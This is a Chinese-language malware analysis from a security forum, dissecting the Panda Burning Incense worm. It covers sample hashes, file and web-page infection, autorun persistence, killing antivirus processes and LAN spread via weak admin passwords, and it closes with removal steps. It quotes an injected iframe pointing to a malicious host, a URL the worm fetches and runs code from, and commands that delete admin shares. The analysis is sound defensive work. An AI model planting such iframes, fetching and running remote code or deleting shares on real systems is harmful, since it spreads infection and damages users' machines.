分析經典病毒熊貓燒香

參考書籍：

《VC++反彙編與逆向分析技術揭秘》

《姜曄病毒木馬實戰查殺》

1. 樣本概況

1.1 樣本信息

• 病毒名稱：panda.exe
• 文件大小：61952 bytes
• MD5值：3520D3565273E41C9EEB04675D05DCA8
• SHA1值：BB1D8FA7EE4E59844C1FEB7B27A73F9B47D36A0A
• CRC32：23B6DA2A
• 病毒行為：

複製自身、感染PE文件、覆寫PE文件、修改註冊表自啟動、枚舉進程、結束殺軟進程、刪除安全軟體相關啟動項。

1.2 測試環境及工具

火絨劍、OD、IDA、MD5工具、Win7

1.3 分析目標

分析此病毒的惡意行為

2. 具體行為分析

2.1 主要行為

病毒的主要行為分三部分：

第一部分（自我保護與自我複製）：

複製自身到系統目錄、雙擊被感染程序可以檢測判斷spclosv.exe是否存在，從被感染的文件分裂出病毒程序重新執行

第二部分（感染部分）：

感染全盤（本地）、定時器感染全盤（本地）、區域網感染（聯網）

第三部分(病毒自我保護)：

設置註冊表、停止殺軟、網站下載代碼並執行

2.1.1 惡意程序對用戶造成的危害（圖）

? 病毒複製自身到系統目錄下名字為spcolsv.exe

? 每個目錄下生成Desktop_.ini（記錄日期）文件

? 感染全盤二進位文件與腳本文件

? 將病毒Svcshare設置開機自啟動Run

? 盤符根目錄下生成setup.exe與autorun.inf文件

2.2 惡意代碼分析

2.2.1 病毒主邏輯

對比字元串是否相等，不相等則退出

2.2.2 病毒自我複製與自我保護分析詳解

? 遍歷進程找到病毒進程（spcolsv.exe）就退出並結束掉

? CopyFile到系統目錄（C:WindowsSystem32drivers）,然後就運行程序(spcolsv.exe)

? 如果是病毒自身工作就完成了，假設是被感染程序就會額外執行一段代碼

? 感染後程序頭五個位元組都是Whboy並且結尾都帶數字

? 將源文件和病毒文件分離出來

? 創建批處理文件功能是判斷spclosv.exe是否存在，從被感染的文件分裂出病毒程序重新執行。

Path (C:User15PB-W~1AppDataLocalTemp75$$.bat)

2.2.3 病毒感染全盤分析詳解

病毒感染全盤分三方式感染分別為：全盤感染（本地）、建立計時器感染（本地）、區域網感染（需要網路支持）

? 第一種全盤感染（本地）詳解：

? 遍歷磁碟，找出存在的盤符並保存

? 排除特殊文件夾，進行感染操作遞歸遍歷目錄所有文件，並生成文件

? 刪除系統備份文件.GHO

? 如果是文件則進行感染，感染的文件類型分兩種：

第一類：exe、scr、pif、com（40800C）

部分代碼分析：

• 判斷感染程序是否進行，不是繼續
• 將要感染的程序內容寫入內存
• 判斷感染程序是否有WhBoy字元，有就說明被感染了
• panda.exe內容直接覆蓋到要感染程序（此時是61KB）

• 被感染文件的內容和病毒文件融為一體

第二類：htm、html、asp、php、jsp、aspx

網頁感染：

主要將字元串（<iframe src=http://www.krvkr.com/worm.htm width_=0 height=0></iframe>）添加到文件末尾。

? 第二種定時器感染方式（本地）：

? 創建一個定時器每隔6000MS啟動一次0x40C0B8函數

? 判斷盤符根目錄setup.exe、aoturun.inf文件是否存在，不存在就創建

? 第三種區域網感染方式：

? TCP客戶端建立

? 當病毒發現能成功聯接攻擊目標的139或445埠後，匹配管理員弱密碼，連接成功複製自身病啟動激活病毒。

（因為伺服器之類無法連接這裡我自己也只能大概分析不是很詳細就不貼圖了）。

2.2.4 病毒自身保護分析詳解

病毒創建了四個定時器：

? 先分析第一個定時器（1秒觸發一次）40CD30函數

? 將病毒Svcshare設置開機自啟動Run

? 設置不顯示文件隱藏（讓用戶無法顯示隱藏文件）

? 添加特權

? 遍歷到殺軟就關閉

? 結束進程（任務管理器之類的）

? 分析第二個定時器（20分鐘觸發一次）40CE8C函數

? 從http://wangma.9966.org/down.txt網站讀取到網頁源代碼並且運行代碼

? 分析第三個定時器（10秒觸發一次）40CE94函數

調用如下命令來刪除共享：

cmd.exe /c net share C$ /del /y

cmd.exe /c net share A$ /del /y

cmd.exe /c net share admin$ /del /y

? 分析第四個計時器（6秒觸發一次）407540函數

刪除服務、刪除安全軟體相關啟動項

3. 解決方案（或總結）

3.1 提取病毒特徵，體用殺毒軟體查殺

特徵包括：

http://wangma.9966.org/down.txt

3.2 手工查殺步驟/工具查殺步驟/差啥思路等

• 刪除【C:WindowsSystem32driversspcolsv.exe】文件
• 刪除【HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVer
• sionRun】鍵項的svcshare
• 刪除每個盤符根目錄下生成兩個文件【autorun.inf和setup.exe】文件
• 設置【HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorer
• AdvancedFolderHiddenSHOWALL】，CheckedValue的鍵值設置為1（顯示隱藏文件）

致謝15PB對本人學習上的幫助

本文由看雪論壇 黑手魚 原創，轉載請註明來自看雪社區